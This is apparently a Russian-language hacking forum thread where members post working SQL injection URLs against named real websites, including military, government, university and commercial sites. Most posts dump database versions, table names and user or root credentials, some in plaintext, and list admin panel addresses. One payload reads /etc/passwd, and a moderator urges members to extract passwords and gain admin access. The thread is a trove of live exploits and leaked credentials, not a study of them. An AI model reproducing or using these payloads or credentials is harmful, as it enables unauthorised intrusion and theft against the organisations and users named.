www4.army.mil
http://www4.army.mil/otf/eCal.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat_ws(0x3b,user(),database(),v ersion()),22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40/*
С вас пицот у.е =)

http://www.imperialauto.kz/?page=good_info&id=-2+union+select+1,version(),3,4+from+news/*

http://www.tectonic.co.za/view.php?id=1562+and+ascii(lower(substring(version (),1,1)))=0x34

улыбнул вывод данных :)
http://www.mfd.ru/content.asp?code=2+or+1=(select+top+1+table_name+f rom+information_schema.tables)--
табл:
Anketa
banBanners
BankRevolution
banSystems
banUsers
cfgBlocks
cfgChapters
cfgContent
cfgDates
cfgFields
cmtChapters
cmtCommentsViewGeneral
cmtCommentsViewMood
cmtInternal
cmtSource
cmtStream
comment_dates_view
comments
commentsAnother
commentsArc
ctsv_01E0DC7DA24B418AB04757A54FA4992E
ctsv_0C65853E3F3D4456BCE0F66B2FC5BC57
ctsv_266AB0DBF03B45CFA299C8D43260FD70
ctsv_2A8342AADF704B2291CA562D742C43FE
ctsv_53997158E8364D339560D8ACE5A4ADCF
ctsv_64CAEC4BBD124DCE98C36B9239948F97
ctsv_A89FCD59D9024E26AC9B8EECF473AE29
ctsv_D0D9FB8A3F054A82948C465F27371818
dtproperties
dtThemes
GrfxView
Locator
MfdUsers
mrktInformerSubscriber
MSdynamicsnapshotjobs
MSdynamicsnapshotviews
MSmerge_altsyncpartners
MSmerge_contents
MSmerge_delete_conflicts
MSmerge_errorlineage
MSmerge_genhistory
MSmerge_replinfo
MSmerge_tombstone
MSrepl_identity_range
MSreplication_subscriptions
MSsubscription_agents
news
newstoc
qstAnswers
qstQuestions
qstVariants
Questionary
Questions
Rating
Subscribes NEWS
sysconstraints
sysmergearticles
sysmergeextendedarticlesview
sysmergepublications
sysmergeschemaarticles
sysmergeschemachange
sysmergesubscriptions
sysmergesubsetfilters
syssegments
tAnonce
tBI_Client
tBI_Total
tDocument
tempGrfx1
tempGrfx2
textadv
tFnews
tForum
tForumMember
tForumMsg
tForumMsgState
tForumRole
tForumRoleLnk
tForumStatus
tForumType
tGenerator
TickerLocator
tMacroIndexType
tMacroIndexUSD
tResources
tRotateNews
tsvw_01E0DC7DA24B418AB04757A54FA4992E
tsvw_0C65853E3F3D4456BCE0F66B2FC5BC57
tsvw_266AB0DBF03B45CFA299C8D43260FD70
tsvw_2A8342AADF704B2291CA562D742C43FE
tsvw_53997158E8364D339560D8ACE5A4ADCF
tsvw_64CAEC4BBD124DCE98C36B9239948F97
tsvw_A89FCD59D9024E26AC9B8EECF473AE29
tsvw_D0D9FB8A3F054A82948C465F27371818
tUserValue
UserTable
бабах! =)
http://www.km.ru/tests/tests.asp?code=9+or+1=@@version--

http://sibrc.tsu.ru/region_center.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c oncat_ws(0x203a20,version(),user(),database()),33/*
http://edu.tsu.ru/index.php?sub=9&page=res&subpage=info&id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3b20,us er(),database(),version()),10,11,12,13,14,15,16,17 ,18,19,20,21,concat_ws(0x203a20,id,fio,email,statu s,name,password),23,24,25,27+from+login+limit+0,50/*
поле с логинами не осилил =\

http://news.mc.duke.edu/ - PR 7
http://news.mc.duke.edu/news/article.php?id=-9863+union+select+user(),2,3,4,5,password,7,8+from +mysql.user/*


User: web
Password(хеш): 623460e26f081bbc


http://stmarys-ca.edu/ - PR 6

http://stmarys-ca.edu/news_events/news/viewstory.php?id=-92+union+select+1,2,3,4,user(),6,7,password,9,10,1 1,12,13,14+from+my
sql.user/*


User: webdb
Password(хеш): 456791a12266fca0

Проблемы с выводом...кодировку пытался менять - не помогло.
http://www.kiel.ru/?news=-4+union+select+1,2,3,4,5,6/*

Проблемы с выводом...кодировку пытался менять - не помогло.
http://www.kiel.ru/?news=-4+union+select+1,2,3,4,5,6/*
http://www.kiel.ru/?news=-4+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version (),0x71),0x71),4,5,6/*

http://www.leki.med.pl/lek.phtml?id=0+union+select+aes_decrypt(aes_encryp t(concat_ws(0x203a20,version(),user(),database()), 324),324)/*&idnlek=255&menu=3
http://www.voyage-luxe.ru/chapter64.html?uid=-4+union+select+concat_ws(0x3a,version(),user(),dat abase()),2/*

Харцызский Трубный Завод
http://www.ukrpipe.com.ua/RUS/news.php?id=-1+union+select+1,2,3,table_name+from+information_s chema.tables/*

Всеукраинская техническая газета
http://www.vtg.lg.ua/index.php?year=2006&id=-41+union+select+version(),user(),database(),4,5/*

http://www.cubatravel.cu/client/products/products.php?id=-3+union+select+user(),2/*

http://tj.cafspeech.kz/site.php?lan=english&id=2&newsid=-180+union+select+version()/*
http://azgroup.kz/binar.php?id=-2'+union+select+concat(user,char(58),password),ver sion(),3,4,5,6,7,8,9,10,11,12+from+mysql.user/*

http://www.voinaimir.ru

Там почти на каждой странице скуля:

http://www.voinaimir.ru/dicdefinition/?id=-1+union+select+1,2,3,4,5,concat(database(),char(58 ),user(),char(58),version()),7,8/*
http://www.voinaimir.ru/dicchapter/?id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6/*
http://www.voinaimir.ru/reviewlist/more/?id=-1+union+select+1,2,3,4,5,6,concat(database(),char( 58),user(),char(58),version()),8,9,10,11/*
http://www.voinaimir.ru/news/more/?id=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6,7,8,9,10,11/*

http://www.coservices.be/main.php?lang=FR&id=-79+union+select+1,2,convert(concat(username,0x3a,p assword)+using+latin1),4,5,6,7+from+users/*
wouter:35bd37524b997d6ddd579756fde4756e

http://fots.ru/gal/?gal=-1947+union+select+1,2,3,version(),5,6,7,8,9,10,11/*

хз, от чего пасс, но вывод в тайтле)
cgi-формы логина в наличии есть, но там другая инфа нужна.. остальные таблицы не подбирал

http://www.sinauer.com/detail.php?id=-1'+union+select+concat(user,0x3a,pass)+from+users/*
антибаян не пашет, не проверил.. мб кто докопается, все-таки pr = 6 )

http://law-c.ru/document.php?id=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5/*

----------------------------------

http://www.namakon.ru/articles.php?id=9999999999+union+select+1,2,concat (database(),char(58),user(),char(58),version()),4, 5,6,7,8,9/*

/etc/passwd:

http://www.namakon.ru/articles.php?id=9999999999+union+select+1,2,load_f ile(0x2f6574632f706173737764),4,5,6,7,8,9/*

----------------------------------

http://www.vch.ru/cgi-bin/guide.cgi?table_code=12&action=show&id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8/*

http://www.vch.ru/cgi-bin/guide.cgi?table_code=12&action=show&id=-1+union+select+1,2,table_name,4,5,6,7,8+from+infor mation_schema.tables/*

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS

ALPHABET
ALPHABET_ENG
ANONS
BELARUS
BELARUS_V
CARRIERS
CARRIERS_ENG
CONTENT
CONTENT_ENG
CRYPTO
CUSTOMS
CUSTOMS1
CUST_BOD
CUST_BOD_ENG
CUST_BOD_MOS
CW
DEPARTMENTS
DEPARTMENTS_ENG
DOCS
DOCS_EMCTC
DOCS_ENG
DOCS_T
DUTYFREE
ECONOMY
ECONOMY_ENG
EMCTC_CONTENT
EMCTC_NEWS
EMCTC_NEWS_SECTIONS
EVROAZS
EVROAZS_ENG
HIT
INFRINGERS1
INFRINGERS2
KAZAHSTAN
KAZAHSTAN_V
KLIENTI
LINKS
LOGISTIC
LOGISTIC_ENG
NEWS
NEWS_ENG
OTO
POPULYR
PRACTICE
QUESTIONS_VCH
REFERATS
REVIEW
REVIEW_ENG
RUMORS
RUMORS_ENG
SEMINARS
SHIFR
SHIT
SearchStrings
TEMP
TEXT
TEXT_ENG
TW
UKRAINA
UKRAINA_V
VASYANYA
VTOROSSII
WAREHOUSES
aaa
banners
banners_eng
baz_sklad
doska_bodies
doska_headers
garant_banks
item
item_group
job_bodies
job_headers
price30
tam

http://www.turimpex.ru/pg.php?id=-2'+union+select+1,2,3,4,5,6,7,version(),9,10,11,12 ,13/*
http://oncoplastic.ru/rak.php?id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(email,0x7 8),0x78),3,4,5,6+from+admin/*
http://www.datacd.ru/faq.php?id=-2+union+select+1,version(),3+from+news/*

Национальная Академия Социальных Технологий

www.st-academy.ru

Достаем имя пользователя, базы и версию мускула:
http://st-academy.ru/nast/news/?id=-1+union+select+1,concat(user(),0x3b,database()),3, convert(version(),char),5,6,7,8,9/*

Форум самописный и там ничего интересного, зато есть таблица user:
http://st-academy.ru/nast/news/?id=-1+union+select+1,concat(login,0x3b,email,0x3b,icq, 0x3b,pass),3,4,5,6,7,8,9+from+user+limit+1,20/*
пароли в открытом виде, лимит вам в помощь ;)

http://www.music3000.com.ua/?p=club&sp=news&id=-348+union+select+concat(login,char(58),pass)+from+ users/*

http://www.xclan.ru/showthread.php?t=425
дак это кто из вас нашёл то?
а так +

http://www.vigray.ru/heading/index.php?iid=-237+union+select+1,2,concat(login,0x3a,pass),4,5,6 ,7+from+users/*
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,version(),3,4,5,6/*

yahoo - рулез!
yahoo`ярю! (с)
Всё - .edu !

http://www.skio.peachnet.edu/resources/library/serials.php?action=view&print=1&id=-57+union+select+version(),user()/*
http://www.ksg.harvard.edu/iop/students_internships_db.php?action=id&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25/* - PR 8

http://journalism.berkeley.edu/events/details.php?ID=-322+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
http://alliance.la.asu.edu/azga/lp_view.php?lesson_id=-390+union+select+version()/* - в самом низу
http://www.loyno.edu/civildiscourse/journal.php?action=article_view&topic_id=4&article_id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+mys ql.user/*

У многих есть доступ к таблице user, PR от 4 до 8. Разбирайте!

Спасибо огромное Isis!!! Сладенькое:
http://www.library.vcu.edu/ - PR 6


http://www.library.vcu.edu/whatsnew/news_result.cfm?ID=-744+union+select+1,2,convert(concat_ws(0x3b,passwo rd,user)using%20latin1),4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19+from+mysql.user


User: root
Password: 3f378de07c02b3c4

P.S.
Эээ... а что означает вывод:

General error: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'


???

P.S.
Эээ... а что означает вывод:

General error: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Это означает что вывод нужен в кодировке latin1
convert(concat_ws(0x3b,version(),user(),database() ) using latin1)

http://www.autosave-scotland.co.uk/%20shop/choose_model.php?manID='
www.qmul.ac.uk/courses/department.php?dept_id='
www.wilkinson-sword.co.uk/index.php?id='

random
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,version(),3,4,5,6/*

http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,concat_ws(0x203a20,aID,aName,aPa ss,aEmail),3,4,5,6+from+tutvsesv_tvs.tvs_auth+limi t+0,1/*

http://ts.motronline.com/login.php?detail='+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,concat_ws(0x203a20,admin_id,admin_pass),1 4,15,16,17,18,19,20,21,22,23+from+gllcts2_admin+li mit+0,50/*
http://www.bridgewater.edu/index.php?id=-857+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_enc rypt(concat_ws(0x3a,id,username,password),31337),3 1337),9,10,11,12,13,14,15,16,17,18,19,20+from+user s+limit+17,3/*

http://www.technepress.nl/publications.php?id=-19+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
=)

http://www.ciritas.ru/product.php?id=-10+union+select+1,2,id,4,name,6,7,8,9+from+client/*

.gov


http://iff.immigration.gov.tw/enfront/lifep.php?tr_id=2&id=-111+UNION+SELECT+1,2,3,concat_ws(0x3a,user,passwor d),5+from+mysql.user/*


MySQL

root:admin


http://www.colerainebc.gov.uk/show.php?id=-1111+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user,pass word),6,7,8,9,10,11+from+mysql.user/*


root:47bccb536d8ad7ee

http://fuckthedrugs.net/groups/stream.php?memo_id=12+UNION+SELECT+1,username,3,4, password,6,7,8+FROM+mysql.users/*
root:58ac58431c5a1a5e

http://www.happyland-drink.ru/brands.php?id=-2+union+select+1,concat(id,char(58),password,char( 58),user,char(58),email,char(58),phone),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5+from+partners+limit+321,1/*

http://www.westlinegroup.ru/index.php?id=-182+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,1 2,13/*

http://www.mediasoyuz.ru/news/index.php?id=-712+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,1 2/*

http://www.moiki.net/articles.php?id=-16+union+select+VERSION(),2/*

http://bannerinter.com/index.php?id=2+union+select+1,2,table_name,4+from+ INFORMATION_SCHEMA.TABLES/*

http://www.ukrprint.com/job/show_message.php?id=-1820+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21/*

http://www.hosser.ru/index204.php?id=-379+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9+from+cl ients/*

http://www.pr.kg/or/detail.php?id=-231+UNION+SELECT+1,2,3,4,5,concat(id,0x3a,name,0x3 a,pass,0x3a,email),7,8+from+users/*

http://photoshopia.ru/forum/arcade.php?gsearch='+union+select+1,2,3,4,concat(u ser(),char(58),password,char(58),version()),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34+from+users/*

вывод внизу.

http://www.slavrealt.ru/geografia.php?object=9+union+select+1,2,3,4,5,6/*

http://www.algoritmia.net/articles.php?id=-31+union+select+1,concat(password,CHAR(32,62,62,32 ),email),3,4,5,6+from+users+limit+0,5000/*

.gov

http://www.maineservicecommission.gov/news/release.php?ID=-252+union+select+1,2,version(),database(),user(),6 ,7,8,9,10,11,12/*


.edu

http://www.wishard.edu/news/release.php?id=-38+union+select+1,version(),database(),4,user(),6/*


.org

http://www.camdenme.org/news/release.php?ID=-63+union+select+1,2,3,4,user(),database(),7,8,9,10 ,11,12,13,14,version()/*
http://www.meprcouncil.org/news/release.php?ID=-66+union+select+1,2,user(),version(),database(),6, 7,8,9,10,11,12/*


.com

http://www.simonv.com/music/release.php?id=-78+union+select+concat(user(),version(),database() )/*
http://www.mainelobsterfestival.com/release.php?ID=-13+union+select+1,2,3,version(),user(),6,database( ),8,9,10,11,12/*
http://www.peyron.com/release.php?id=-26+union+select+1,2,3,concat(version(),user()),dat abase(),6,7,8/*


.net

http://www.integralwireless.net/news_media/release.php?id=-13+union+select+1,version(),database(),4,5,user(), 7,8,9/*


Вкусненькое:

http://www.daltonagency.com/


http://www.daltonagency.com/release.php?id=-51+union+select+1,user,password,4,5,6,7+from+mysql .user/*


User: root
Password:51f2005954eb9d3e


http://www.playavista.com/

http://www.playavista.com/about/news/release.php?id=-18+union+select+1,2,3,4,5,6,convert(concat_ws(0x3b ,password,user,database())using%20latin1),8+from+m ysql.user/*


User: root
Password:*ECA88AB9EB85925FD22E637244E4E57A7C906C0A

4й мускул, таблицы подобрать не смог

_http://www.uprava.org/section.php?id=-19+union+select+1,2,3,4,5,6,7/*&sub_id=126
_http://www.trimm.ru/php/content.php?group=2&id=-3869+union+select+1,concat(user(),0x3a,version(),0 x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35/*

зы антибоян Константина не пашет, так что за повторы не ручаюсь.

http://www.tehv.at/page/check.php?id=-62+union+select+1,2,password,4,5+from+user/*

http://www.accilifeskills.com/life-skills-curriculum/bad-check.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,version(),database(),user()),12/*
несколько минут в гугле =\

во ищо одна
http://www.tppmo.ru/index.php?id=2&page=-3099+union+select+1,2,3,4,5,6/*

http://www.inforos.ru

------------------------------------------------------

SQL инъекция:

http://www.inforos.ru/?id=111111111111+union+select+concat(database(),ch ar(58),user(),char(58),version()),2,3,4,5,6,7,8,9, 10/*

http://www.inforos.ru/?idraz=111111111+union+select+1,concat(database(), char(58),user(),char(58),version()),3,4,5,6,7/*

http://www.inforos.ru/?idt=1111111111+union+select+1,concat(database(),c har(58),user(),char(58),version()),3,4,5,6,7/*

http://www.inforos.ru/firm/?parent=111111111+union+select+1,2,concat(database (),char(58),user(),char(58),version())/*

http://www.inforos.ru/?idp=1111111+union+select+concat(database(),char(5 8),user(),char(58),version())/*

inforosnet:inforosnet@localhost:5.0.41-log

------------------------------------------------------

Таблицы:

http://www.inforos.ru/?id=111111111111+union+select+table_name,2,3,4,5,6 ,7,8,9,10+from+information_schema.tables+limit+26, 1/*

conf_table_2005
inforos_about
inforos_about_photo
inforos_about_price
inforos_contact_person
inforos_document
inforos_enfirm
inforos_ensalebanner
inforos_firm
inforos_firm_to_rubrika
inforos_main
inforos_main_old
inforos_manager
inforos_myfirm
inforos_personali
inforos_region
inforos_region_firm
inforos_region_firm_old
inforos_reklama
inforos_reklama_t
inforos_rublika
inforos_rubrik_firm
inforos_rubrik_firm_t
inforos_salebanner
inforos_salebannertype
inforos_schet
inforos_search_fon
inforos_shablon
inforos_subscribe
inforos_subscribe_
inforos_themas
inforos_tmain
inforos_top_banner
inforos_translate
inforos_type
inforos_type_firm
inforos_user_reklama
inforos_user_reklama_t
otvet_admin_2005

------------------------------------------------------

inforos_manager:


http://www.inforos.ru/?id=111111111111+union+select+concat(id_manager,ch ar(58),fio_manager,char(58),phones_manager,char(58 ),files_manager,char(58),firms_manager,char(58),lo gin,char(58),pass,char(58),trec),2,3,4,5,6,7,8,9,1 0+from+inforos_manager+limit+0,1/*

http://www.inforos.ru/?id=111111111111+union+select+concat(login,char(58 ),pass),2,3,4,5,6,7,8,9,10+from+inforos_manager+li mit+0,1/*

shurik:shurik
wer:wer

http://www.euro-honey.com/shop/product_info.php?products_id=166+limit+0+UNION+SEL ECT+null,concat(user(),0x3a,version())/*
нашел только таблицу admin, да и то, поля не мог найти

http://www.uzgeolcom.uz/structure.php?lng=rus&id=-8+union+select+1,2,3,concat(login,0x3a,passw),5+fr om+users/*&oper=lst
Larisa:f5adec1d9b21223c5c0ca9ca49414d56
Государственный Комитет по Геологии и Минеральным Ресурсам Р Уз

http://ipodmania.ru/index.php?state=catalogs&activeCategory=181-1
Пустышка?
http://ipodmania.ru/index.php?state=catalogs&activeCategory=184+union+select+1,concat(login,0x3 a,password)+from+user/*
угук вывода нет (

н:
http://hspbru.majordomo.ru/?do=structure&pid=1&id=-1+union+select+version(),user()/*
http://hosting.rbc.ru/ru/support/cron/?id35=-1'+union+select+1,2,3,4,5,6,7,8,convert(concat_ws( 0x3b,user(),database(),version())+using+cp1251),10 ,11/*
http://ru-hosting.ru/news.php?hnews_id=-1+union+select+1,2,concat(0x3d,user(),version(),na me,pass),4,5+from+users/*
http://sevinfo3.valuehost.ru/cbs/showalmanah.php?almanac_code=-1+union+select+1,concat(0x3a,user(),version(),data base()),3,4,5,6/*

blind, кажется
http://www.okolosport.ru/transfers/leagues/en_epl.php?tw_id=4&club_id=66+union+select+1,2,3,4,5,6,2,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47&lang=rus

http://www.pr.kg/n/detail.php?id=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6,7,8,9,10,11,12,13,14, 15,16,17,18/*

prkg:prkg@localhost:5.0.37-log

http://www.pr.kg/n/detail.php?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13,14,15,16,17,18+from+information_schema.tables+ limit+16,1/*

banner
group_membership
groups
keywords
krena
modify_diff
modify_mod_now
module_vars
news
news_category
or_news
perm_group
poll
poll_comment
poll_config
poll_data
poll_index
poll_ip
poll_log
poll_templates
poll_templateset
poll_user
pollip
pr_comments
pr_head
pr_news
pr_partners
pr_source
pr_titles
pr_user_online
reg_vars
session_info
sniffer_country
sniffer_hits
sniffer_hosts
sniffer_ip2c
sniffer_os
sniffer_point_out
sniffer_res_depth
sniffer_search_engines
sniffer_urls
sniffer_user_agent
structure_info
tbl_admlogins
tbl_admlogs
tbl_sessions
trigger_log
users
vars

-----------------
tbl_admlogins
-----------------

http://www.pr.kg/n/detail.php?id=-1+union+select+1,2,3,4,concat(pk_alId,char(58),alU serName,char(58),alPass,char(58),alEmail,char(58), alFName,char(58),alLName,char(58),alSecLevel,char( 58),alDateJoined),6,7,8,9,10,11,12,13,14,15,16,17, 18+from+tbl_admlogins+limit+0,1/*

3:askar:271983:askar@kaf-i.kg:Askar:Makeshov:2:10/02/05
6:jama:jama:jama@infotel:Джамиля:Мамше ва:2:24/04/2007
7:pizdec:pizdec::haker::2:14/06/2007 - кто то свосем не давно побаловался)

http://www.pr.kg/n/adm - админка1
http://www.pr.kg/or/adm - админка2

Код:
http://www.euro-honey.com/shop/product_info.php?products_id=166+limit+0+UNION+SEL ECT+null,concat(user(),0x3a,version())/*

нашел только таблицу admin, да и то, поля не мог найти

http://www.euro-honey.com/shop/product_info.php?products_id=166+limit+0+UNION+SEL ECT+null,concat_ws(0x3a,admin_id,admin_password,ad min_lastname)+from+admin/*

//там еще табличка products

///lothlorian

пожалуйста помогите ломануть shram.kiev.ua/forumтебе в тему 'просьбы о взломах'

http://www.tppmo.ru/index.php?id=23'&page='+union+select+1,2,3,concat(username,char(58) ,password),5,6+from+admin/*

1:446df2be0c8667f2

http://www.tppmo.ru/admin/


_http://www.vaal.ru/show.php?id=1+union+select+1,2,3,4,5,6,7,8,version (),10,11/*

_http://www.k-gb.ru/object.php?id=4+union+select+version()/*

Что бы избежать дальнейших накруток и притензий, ограничтесь при выставление репутации в этой теме её колличеством от 1 до 3.

Многие инъекции, которые вы выкладываете, "не доведены до ума", иногда кажется, что это всё выкладывается только, что бы запостить пост и показать, что ты умеешь делать sql инъекции, в результате получается большая активность. Только толку от неё нету, пробуйте не просто подбирать кол-во колонок, выводить инфу о БД, но и подбирать таблицы и имена колонок - получать пароли пользователей, доступ в админку. Это и интереснее и имеет хоть какой то смысл, в отличие от тупого выкладывания большого кол-ва инъекций.

При оценивание постов в этой теме, старайтесь сделать это как можно более рационально - не стоит ставить +3 за не полностью раскрученную инъекцию.

Инъекции вида:

http://site.ru/index.php?a='

будут удаляться.

com и edu.

http://www.firmmagazine.com/members/news.php?id=-702+union+select+1,version(),user(),4,5,6,7,databa se(),9,10,11/*
http://its.med.yale.edu/announcements/announce.php?id=-334+union+select+version(),2,user(),4,5,6,7,8,data base()/*

http://host21.ru/index.php?id=-9+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 +from+INFORMATION_SCHEMA.TABLES+limit+17,1/*

http://www.snezhny.com/autors.php?id=-284+UNION+SELECT+concat(id,char(58),name,char(58), pass,char(58),email),2,3,4,5,6,7,8,9+from+user+lim it+3000,1/*

http://dma.ucla.edu/gallery/faculty_gallery.php?ID=-9999+union+select+1,2,3,USER(),VERSION(),6,7,8,9,1 0,11,12/*

http://www.myminsk.com/catalog/info.php?id=-4255+union+select+1,2,3,4,concat_ws(0x203a20,table _name,column_name),6,7,8,9,10,11,12,13,14+from+inf ormation_schema.columns/*

http://webmoney.dn.ua/view.php?id=-33+union+select+1,VERSION(),3,4/*

вывод данных в левом верхнем углу
http://www.trubka.net/showarticle.php?id=-1083690272+union+select+1/*

http://www.sotovikm.ru/phone.php?ID=-4915+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11, 12/*

http://www.sfpio-alsace.com/forum/philboard_forum.asp?forumid=-1+union+select+0,username,password,3,4,5,6,7,8,ema il,password,username,10,11,12,13,14,15,16,17,18+fr om+users

http://gonafish.com/index.php?id=-1+union+select+1,2,3,4,5,6/*

http://www.kadikoy.gov.tr/haberler.asp?ID=90+union+select+0,1,username,passw ord,4,5,6,7+from+admin


С вас 40 турецких

http://www.zatulin.ru/index.php?section=news&id=239+and+1=0+UNION+SELECT+1,2,login,4,5+from+use rs/*

http://www.noev-kovcheg.ru/
mysql 5
названия таблиц и колонокhttp://www.noev-kovcheg.ru/issue.php?id=-402+union+select+1,2,3,4,concat_ws(0x3a,table_sche ma,table_name,column_name),6,7++from+information_s chema.columns/*вывод без лимита.

91758 Result(s) Found

ППЦ , все на хотмыле или на аоле с мсм-ами... короч юзеров вагон неипаца!!)) :p


http://www.newspaperads.com/usatoday/results.asp?subcatid=-1))%20union%20select%201,2,3,4,email,6,password,8, 9,0,1%20from%20RegisteredUser--&interfaceid=&parent=&subcatname=&ddate=&count1=&count2=&count3=&count4=&count5=&count6=&website=usatoday&pubid=&searchtext=&orderby=&page=4584

http://www.nkrusa.org/news/daily_news.php?id=-1044+union+select+1,2,3,4,l_username,l_password+fr om+login/*

В самом низу!!!
http://www.number.ru/links/index.php?cat=-1+union+select+user,password,5,6,7,8,9+from+mysql. user/*

http://www.aoecs.org/news/list.php?type=11+union+select+1,2,user(),database( ),5,6,7,8/*

Антибоян нахлабучило, холм прикрыл мой сайт, потому что я юзал фтпщник под свои личные нужды.. так что предеться немного подождать.
+ к этому у neval а неплохая получилась конструкция, возможно у него антибоян будет базироваться
з.ы кстати неплохо было с 220 по эту страничку собрать иньекты так что стучите в асю кто поможет

http://www.cspr.info/index.php?view=statti&sub_id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6/*

cspr_cspr:cspr_cspr@localhost:4.1.21-standard-log

Форум:

http://www.cspr.info/index.php?view=statti&sub_id=-1+union+select+1,2,concat(username,char(58),user_p assword),4,5,6+from+phpbb_users+limit+1,1/*

admin:34d7b21152ce773f71ddcc88c99d4231:::shutnick

Сайт:

http://www.cspr.info/index.php?view=statti&sub_id=-1+union+select+1,2,concat(login,char(58),password) ,4,5,6+from+users/*

admin:forgetit

Всё раскрыто, всё перед вами))
id : username : pass(md5) : email : icq

http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a ,user_password,0x3a,user_email,0x3a,user_icq),3,4, 5,6+from+phpbb_users+limit+1,600/*

Антибоян:

http://antiboyansql.narod.ru

http://antiboyansql.narod.ru/sql.txt

http://hack-shop.org.ru/sql.php

----------------------------------------------------------------

Constantine я тебе личку отправил, логин и пароль к сайту.

http://kozaky.org.ua/index.htm?tema=-1+union+select+convert(version()+using+cp1251)/*

http://kava.lviv.ua/event/index.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,i d)+from+admin/*

http://www.secureworldexpo.com/ - PR 5

Вот те блин и secureworldexpo ! Да...

http://www.secureworldexpo.com/events/index.php?id=-228+union+select+1,concat(username,1,password),3,4 +from+login/*


User: secureworld
Password: secure503
Аднинка: http://www.secureworldexpo.com/admin

http://www.sodalitas.it/news.php?ID=-174+union+select+1,concat(user,0x3a,password),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46+from+user/*
sodal2002:admin.sodal2002
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,version(),3,4,5,6/*

http://www.control.ge/index.php?lang_id=ENG&sec_id=100'
плз - хелп с инъекцией!Не могу понять чето!
http://www.control.ge/index.php?lang_id=ENG&sec_id=100+union+select+1,2,3,4,5,6,7/*

http://www.ninsis.ru/content.php?id=50'+union+select+55,2,3,4,user(),6, 7,database()/*

Мля.. моя первая SQL-инъекция... =)

http://www.ninsis.ru/content.php?id=50'+union+select+55,2,3,4,user(),6, 7,database()/*

Мля.. моя первая SQL-инъекция... =)

вот тебе ещё по втоему сайту)

http://www.ninsis.ru/content.php?id=50'+union+select,concat(user_id,0x3 a,username,0x3a%20,user_password,0x3a,user_email,0 x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1, 600/*

и ещё)))

http://www.ninsis.ru/content.php?id=50'+union+select+50,concat(user_id, 0x3a,username,0x3a%20,user_password,0x3a,user_emai l,0x3a,user_icq),3,%205,6+from+php_users+limit+1,6 00/*

Эстония
http://matkarajad.maaturism.ee/index.php?id=85+union+select+1,2,3,4,5,6--&pg=object
http://www.union.ee/index.php?id='+union+select+1,2,3,4,5,6,7,8,9,10/*
http://surf.triip.ee/index.php?ID=10+union+select+1,2,3,4,5,6,7,8,9--


stmarys-ca.edu
http://stmarys-ca.edu/news_events/news/viewstory.php?id=-24+union+select+1,2,3,4,user,6,7,password,9,10,11, 12,13,14+from+mysql.user/*

login:root
pass:456791a12266fca0

http://www.solntseva.com/biblio_detail.php?id=-16+union+select+1,concat(user_id,0x3a,username,0x3 a%20,user_password,0x3a,user_email,0x3a,user_icq), 3+from+phpbb_users+limit+1,1/*

